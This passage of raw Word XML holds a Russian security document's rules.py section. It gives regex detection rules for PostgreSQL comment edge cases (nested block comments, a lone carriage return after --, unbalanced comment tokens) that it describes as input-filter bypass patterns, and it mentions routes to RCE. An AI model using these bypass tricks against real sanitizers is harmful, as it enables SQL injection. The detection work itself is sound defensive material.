      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Оба дают RCE, но 3.7.1 — server-side, 3.12.3 — client-side (на DBA-машине через psql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703CF49B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>rules.py — готовое правило для класса COMMENT_EDGE_CASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D80CF13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сводный regex по 3.12.1 и 3.12.2. 3.12.3 не покрывается серверным rules.py (см. 3.12.3 — обнаруживается через inventory query, не через SQL-pattern-match).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194F3FB"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4A60A333" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class VulnerabilityClass(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7861AC26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56162431" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    COMMENT_EDGE_CASE = "comment_edge_case"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A774557" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABF6C5"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2C26A714" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass.COMMENT_EDGE_CASE: 7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E476FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5C81E"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1CCAD236" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"comment_nested": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF14A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.12.1 — вложенные block-комментарии (≥2 уровня)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF7CC2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"/\*[^*]*?/\*[^*]*?\*/[^*]*?\*/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7660595F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695183DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"comment_cr_only": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C2339" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.12.2 — одиночный \r после --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59204A86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"--[^\r\n]*\r(?!\n)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7EA98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FA2FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"comment_unbalanced_block": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C6840" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.12.1 — несбалансированные /* и */ — индикатор атаки на парсер</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A83CC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (сравниваем count(/*) vs count(*/) на уровне Python before regex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192FD2B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:/\*[^*]*){3,}|(?:\*/[^/]*){3,}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB29F93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A0AAFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC648E"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4B3A81B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["comment_nested"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F1310"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71DB0E86"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vulnerability_class=VulnerabilityClass.COMMENT_EDGE_CASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC90FFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B770033" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос содержит вложенные /* /* */ */ комментарии. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F93A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "PG обрабатывает их nested-aware (xcdepth counter); "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE0092B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "большинство sanitizer-ов и log-стрипперов non-nested. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCC837F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Паттерн — обход input-фильтра. См. 3.12.1.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DD86EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В application-runtime nested comments крайне редки. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D8871" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "Если payload пришёл из user-input — заблокировать на "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B80AD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "уровне WAF AST-валидатором.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63842E32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED236E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0475290D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["comment_cr_only"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB49564"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33D3E39D"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vulnerability_class=VulnerabilityClass.COMMENT_EDGE_CASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CFC00C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5707672C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Одиночный \\r после --комментария. PG обрывает "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DE284" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "однострочный комментарий на \\r или \\n независимо; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B7D27E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "sanitizer, нормализующий только \\n, пропускает \\r. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C13253C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Паттерн — обход input-фильтра. См. 3.12.2.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25883335" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Нормализуйте line-endings ДО SQL-builder: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75214BDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "value = value.replace('\\r\\n', '\\n').replace('\\r', '\\n').",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19689F21"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5DAD64DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6003751C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["comment_unbalanced_block"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0928D"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33F33431"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vulnerability_class=VulnerabilityClass.COMMENT_EDGE_CASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14261724" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145283AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="≥3 опен или клоуз block-comment-tokens — структура, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C91E474" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "которая часто индикатор обхода log-стрипперов или "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F60BDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "несбалансированной попытки вложения. См. 3.12.1.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5131C8F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В runtime-генерируемом SQL такой паттерн почти "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7A7F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "никогда не легитимен; проверьте источник payload.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3685A"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34F71266" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Градация risk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05899465" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>comment_nested</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
